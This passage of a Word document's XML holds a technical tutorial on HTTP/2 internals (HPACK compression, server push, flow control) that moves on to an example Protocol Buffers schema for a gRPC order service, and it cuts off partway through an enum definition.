        <w:t xml:space="preserve">  HPACK: compress headers using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F4022C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    1. Static table: 61 common headers with pre-defined indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0421A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Index 2 = ":method: GET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B20E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Index 5 = ":path: /"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A7B6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Index 33 = "content-encoding: gzip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD5326" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB90C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    2. Dynamic table: recently sent header name-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DF011" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Add headers to dynamic table as they're sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FAAD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Subsequent requests: reference by index instead of full string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA052B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5479F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Request 1: "Authorization: Bearer eyJhbGc..." → sends full string, adds to table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B96220" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Request 2: "Authorization: Bearer eyJhbGc..." → sends index (2 bytes) instead of 200+ bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6246A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFD898" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    3. Huffman encoding: compress literal values (headers not in table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2684E9C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540957BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Compression ratio: 85-95% for typical HTTP headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05775726" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Authorization header: 200 bytes → 2-3 bytes on repeated requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56FD0F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A370163" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Server push:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D241C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server proactively sends resources client will need:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F046F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Client: GET /index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A145A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server: (push) /style.css + /app.js + /data/initial.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BAE76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">             (before client requests them)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210E90A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC90E5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Client: parses HTML, discovers /style.css → cache hit (already pushed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65389E36" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A5FB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  In practice: server push rarely used effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D626F3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Client may already have cached resources (wasteful push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A118B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Hard to predict what client will need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DCF30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    HTTP/3 deprecates push in favor of 103 Early Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114252CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F9808" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Flow control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2833AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Each stream + connection has a flow control window (default 65,535 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52C28C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Sender: can send up to window_size bytes without waiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE3AC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Receiver: sends WINDOW_UPDATE frames to grant more credit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56215D19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD7780" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Prevents: fast sender overwhelming slow receiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE472A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Enables: per-stream flow control (unlike TCP which is per-connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005CCBB0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="7BD2541D">
          <v:rect id="_x0000_i6617" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FEBF9C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Protocol Buffers — gRPC's Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02097EA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Protobuf Binary Format — How Data Is Actually Encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C3FEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Protocol Buffers (Protobuf) is a language-neutral, platform-neutral, extensible mechanism for serializing structured data. Understanding the binary encoding reveals why it's dramatically more efficient than JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253CF8F8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Protobuf schema (IDL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28151E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBEDD44" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// orders.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B4A7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="25A4FCD1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>syntax = "proto3";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583B73E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>package orders.v1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69198CC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="143AA488" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import "google/protobuf/timestamp.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6C103" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6BE74E21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>option go_package = "github.com/example/orders/v1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD311D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>option java_package = "com.example.orders.v1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641F961" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6C08E1E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Service definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCED7FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39412854" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Unary RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B4FE6D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc CreateOrder(CreateOrderRequest) returns (CreateOrderResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21916242" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc GetOrder(GetOrderRequest) returns (Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61733C77" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE38DCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Server streaming: server sends multiple responses to one request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C3D2E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc ListOrders(ListOrdersRequest) returns (stream Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537DE0AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2105A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Client streaming: client sends multiple requests, server responds once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E258A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc BatchCreateOrders(stream CreateOrderRequest) returns (BatchCreateResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166F7348" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6539E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  // Bidirectional streaming: both sides stream simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2B2A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc OrderUpdates(stream OrderUpdateRequest) returns (stream OrderUpdate);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECC434" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782FCB50" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5C97C6C1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0BC58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28365AD4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48474F35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string user_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B67613" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  OrderStatus status = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC9E3A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated OrderItem items = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF037F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.Timestamp created_at = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325CC3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.Timestamp updated_at = 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C194DB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Money total = 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6AA70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string shipping_address_id = 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D855F6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  map&lt;string, string&gt; metadata = 9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AAE982" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD054F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2F515C73" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message OrderItem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F547CD2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string product_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47456459" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 quantity = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C277EED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Money unit_price = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D26B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string sku = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02DB14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B4244" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1E4A06CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message Money {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F3564A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string currency_code = 1;  // "USD", "EUR"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4225BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  int64 units = 2;            // Whole units</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE5065" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 nanos = 3;            // Fractional units (0-999,999,999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F2E3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE14E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5163EE74" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>enum OrderStatus {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFB581" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_UNSPECIFIED = 0;  // proto3: default must be 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2D5C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_PENDING = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF00AD0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_CONFIRMED = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB9E09" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_SHIPPED = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A9C42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_DELIVERED = 4;</w:t>
      </w:r>
    </w:p>
